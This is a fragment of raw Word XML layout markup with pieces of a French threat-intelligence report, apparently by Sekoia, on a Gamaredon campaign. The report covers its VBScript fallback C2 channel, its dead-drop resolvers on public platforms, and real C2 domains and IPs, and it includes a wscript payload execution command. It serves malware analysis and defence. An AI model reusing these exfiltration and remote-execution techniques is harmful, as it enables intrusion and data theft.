            <wp:extent cx="627125" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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712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SUFFIX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2320" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4026535</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2113303</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1952963" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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9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5 à 10 caractères aléatoires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33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2486048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="996833" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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8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Nom</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle15"/>
                            <w:spacing w:val="26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3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4368" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1927224</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2568798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4427763" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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776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chaîne aléatoire de 5 à 10 caractères (par exemple,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Kjm19.dat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53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2659403</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="454842" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8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6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3250588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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La reconstitution suivante illustre le format de la requête POST avec des valeurs aléatoires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3423943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1611652" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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165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générées par la fonction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8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3698898</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Ce canal de secours fonctionne de manière bidirectionnelle. Au-delà de l’exfiltration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9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3872253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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données, le code peut lire la réponse HTTP afin d’exécuter n’importe quel code VBScript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0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4045608</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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arbitraire sur la machine de la victime. En effet, une fois le téléchargement terminé,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1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4218963</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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fonction recherche dans le corps de la réponse du C2 la chaîne de caractères spécifique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2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4392318</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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cas d’erreur. Si ce délimiteur est détecté, le script extrait tout le contenu q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ui le précède.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3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4584288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5776645" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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664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charge utile est écrite dans un fichier temporaire situé dans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C:\Users\[USER]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460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4799553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2731782" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1782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\AppData\Local\Temp\tmp[XXXX].tmp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5632" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6437439</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4801258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="299793" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7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665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5014818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5860795" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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079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[System.IO.Path]::GetTempFileName())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puis exécutée à l’aide de </w:t>
                        </w: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wscript.exe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768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5230083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2832580" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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58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[TEMP_FILE_PATH] //e:vbscript //b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8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5531508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Cela confirme que les points de contact C2 codés en dur ont une double fonction : ils servent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9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5704863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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 récepteur pour les documents volés lorsque le stockage cloud principal est inaccessible,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0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5878218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4879375" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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93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 font simultanément office de passerelle pour l’exécution de code à distance.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1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6153173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Si le canal d’exfiltration S3 principal et les points de contact C2 de secours codés en dur sont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6326528</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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tous deux inaccessibles, la fonction lance une procédure de récupération de la configuration.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3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6499883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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Cette fonction exploite une technique DDR, en interrogeant des plateformes publiques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4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6673238</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4584049" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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8404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légitimes et réputées afin de récupérer de nouveaux identifiants C2 et S3.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5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6948193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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script exécute séquentiellement des requêtes HTTP GET vers quatre URL codées en dur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6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7121548</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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hébergées sur Telegra.ph, Write.as, Rentry[.]co et Mastodon. La fonction s'arrête dès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7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7294903</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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première récupération réussie de données de configuration valides. Chacune de ces pages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8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7468258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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héberge des chaînes codées contenant les éléments nécessaires à la mise à jour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9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7641613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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identifiants d’exfiltration S3 (clé d’accès, clé secrète, fournisseur et nom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bucket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), ainsi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7814968</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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qu’un domaine et une adresse IP pour les requêtes de secours. Sekoia a constaté que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7988323</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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configurations hébergées sur Telegra.ph, Write.as et Rentry[.]co sont identiques.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3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8161678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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revanche, la charge utile de Mastodon fournit une configuration distincte, pointant vers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4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8335033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4102922" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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292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autre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bucket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S3 (set4 au lieu de set3) et une clé secrète modifiée.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5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8609988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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Une fois l’analyse réussie, ces éléments écrasent la configuration actuelle de la fonction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6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8783343</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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dans le registre. Par conséquent, le prochain cycle d’exfiltration utilisera une nouvelle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7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8956698</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="889264" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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926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infrastructure.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8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9231653</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Si toutes les requêtes DDR échouent, la fonction exécute un dernier mécanisme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9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9405008</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="26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sécurité : elle réinitialise la configuration. Elle réintègre de manière fixe l’adresse IP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0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9575430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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165.22.170[.]129</w:t>
                        </w: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 et le domaine </w:t>
                        </w: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justsstop[.]ru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dans le registre. Cette logique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12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225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430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532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6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8363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6005827</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="1978659"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="269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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-63" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="1978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1978659">
                          <a:moveTo>
                            <a:pt x="0" y="1978659"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="1978659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197865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737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6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840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6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9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27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intéressante ; elle atténue le risque que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se retrouve bloqué avec une configuration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0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6168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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DDR obsolète (par exemple, une publication Mastodon supprimée) en revenant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1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5134467" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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446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l’infrastructure par défaut initiale, dans l’espoir que celle-ci soit à nouveau en ligne.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2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5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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En résumé, ce mécanisme de basculement à plusieurs niveaux garantit la résilience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1755798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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opérationnelle à long terme grâce à la diversification de la chaîne d'approvisionnement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4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1929153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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l'infrastructure. De plus, la possibilité d'exécuter du code VBScript arbitraire via le canal C2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5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2102508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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 secours indique que l'opérateur entend non seulement conserver ses capacités de vol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6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2275863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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données, mais aussi préserver un canal permettant le déploiement de charges utiles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7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2449218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1099233" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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92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supplémentaires.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8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2705767</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3274966" cy="262867"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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4966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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.5Analyse de l'infrastructure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9664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3104540</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2674337" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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4337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4.5.1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Dead Drop Resolvers (DDR)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0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3416958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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L’infrastructure mise en place pour cette campagne associe des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Dead Drop Resolvers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1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3590313</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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plateformes de réseaux sociaux légitimes et des serveurs contrôlés par les opérateurs.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2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3763668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Gamaredon s’appuie fortement sur les DDR pour faciliter la communication entre les vers,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3937023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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les chargeurs et les voleurs de données, en utilisant ces services pour récupérer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4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4110378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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configurations C2 et les détails de déploiement (tels que les adresses IP, les domaines et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4283733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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services comme TryCloudflare ou workers[.]dev) ou pour héberger des secrets, notamment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4457088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2356812" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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681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des jetons pour le stockage cloud S3.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7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4732043</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Parmi les services identifiés comme utilisés dans cette campagne figurent Telegram,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8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4905398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5142430" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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24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Telegraph, Teletype, Lesma.eu, check-host.net, Rentry[.]co, Write.as et Mastodon.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9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5180353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Pour des plateformes telles que Telegram, check-host.net et Lesma.eu, les charges utiles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0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5353708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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hébergées consistent généralement en des domaines, des URL ou des adresses IP parfois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1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5527063</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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protégés par une obfuscation basique, qui est supprimée à l’aide d’expressions régulières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2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5700418</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="656104" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1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VBScript.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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1872615</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7961015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3852973" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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2973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19 – Exemples de plateformes utilisées comme Dead Drop Resolver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8213748</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Dans le cas de Lesma.eu, l’URL spécifique identifiée lors de l’analyse en temps réel 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8387103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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répondait pas. En revanche, l’analyse de check-host.net a révélé l’utilisation de domaines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8557525</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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contrôlés par les auteurs de l’attaque, notamment </w:t>
                        </w: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norosta[.]ru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et des sous-domaines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8737230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5796798" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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aléatoires de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selltosell[.]ru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, pour résoudre les adresses IP C2 ou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staging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8919868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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À l’inverse, Rentry[.]co, Write.as et Mastodon avaient une fonction plus large, hébergeant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9093223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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la fois des indicateurs réseau et des identifiants de compartiment S3, notamment la clé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9266578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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d’accès, la clé secrète, le nom du fournisseur et l’ID du compartiment. Les captures d’écran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1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7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21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7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7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6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7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8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8773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1438907</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="3042297"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="273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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-20" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="30422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3042297">
                          <a:moveTo>
                            <a:pt x="0" y="3042297"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="304229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304229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8336" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2044699</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5535927</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3470910" cy="2710179"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="273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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="0" r="-18" t="-46" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3470910" cy="27101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0910" h="2710179">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="2710179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3470910" y="2710179"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="347091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936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7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038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7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1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27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suivantes montrent la vue destinée à l’utilisateur des URL ciblées (et non celle demandée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2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1882950" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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29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 la fonction en mode API)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3456" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2193924</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4457720</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3211082" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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108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20 – Captures d’écrans des URL stockées sur ces DDR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4710453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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En ce qui concerne Mastodon, il est intéressant de noter que l'historique des publications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5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4883808</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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remonte à la création du compte utilisateur @6o786d68hu. Ces messages datent du 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6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5057163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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octobre 2025 et ont probablement été générés pendant la phase de développement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7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5230518</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="532610" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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61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chaîne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8576" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1059180</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8222635</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5512246" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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224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20 – Captures d’écrans d’un profil Mastodon stockant les IPs du C2 affichant des messages générés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9600" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3155950</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8354080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1287565" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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7565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pendant la phase de test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0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8606813</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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 contenu hébergé sur ces DDR fait l’objet de modifications fréquentes, plusieurs fois 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1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8780168</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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jour. Pour analyser la cadence des mises à jour, Sekoia a surveillé le compte Mastodon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2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8953523</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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spécifique intégré en dur dans la fonction d’exfiltration de données du logiciel malveillant,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3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9126878</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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vérifiant les modifications toutes les minutes entre janvier et février 2026. Sekoia a observé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4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9300233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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un schéma d’automatisation clair : les publications étaient systématiquement mises à jour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5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9473588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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quatre fois par jour à des intervalles réguliers, avec un écart de quelques minutes seulement.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67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7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77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7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88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7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98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7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08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7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90905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8705224</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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00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4936487</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5759449" cy="1605927"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="276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 preferRelativeResize="0">
                      <a:picLocks noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29">
                      <a:alphaModFix/>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect l="-11" r="-11" t="-78" b="0"/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5759449" cy="16059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1605927">
                          <a:moveTo>
                            <a:pt x="0" y="1605927"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5759449" y="160592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160592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110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7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212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7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3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27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Ce schéma indique l’existence d’un mécanisme automatisé ; les heures de mise à jour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4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3505845" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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0584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restent constantes dans une fourchette de cinq minutes.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5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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Il convient de noter une corrélation possible entre la pause d’une journée dans l’activité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6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5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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d’exfiltration automatisée de données de Gamaredon, le 13 février, et les frappes de drones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7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1755798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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ukrainiens menées la veille. Le 12 février, des unités de drones ukrainiennes auraient pris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8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1929153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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pour cible un centre de données situé à Prymorsk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29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, une installation contribuant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9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2102508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
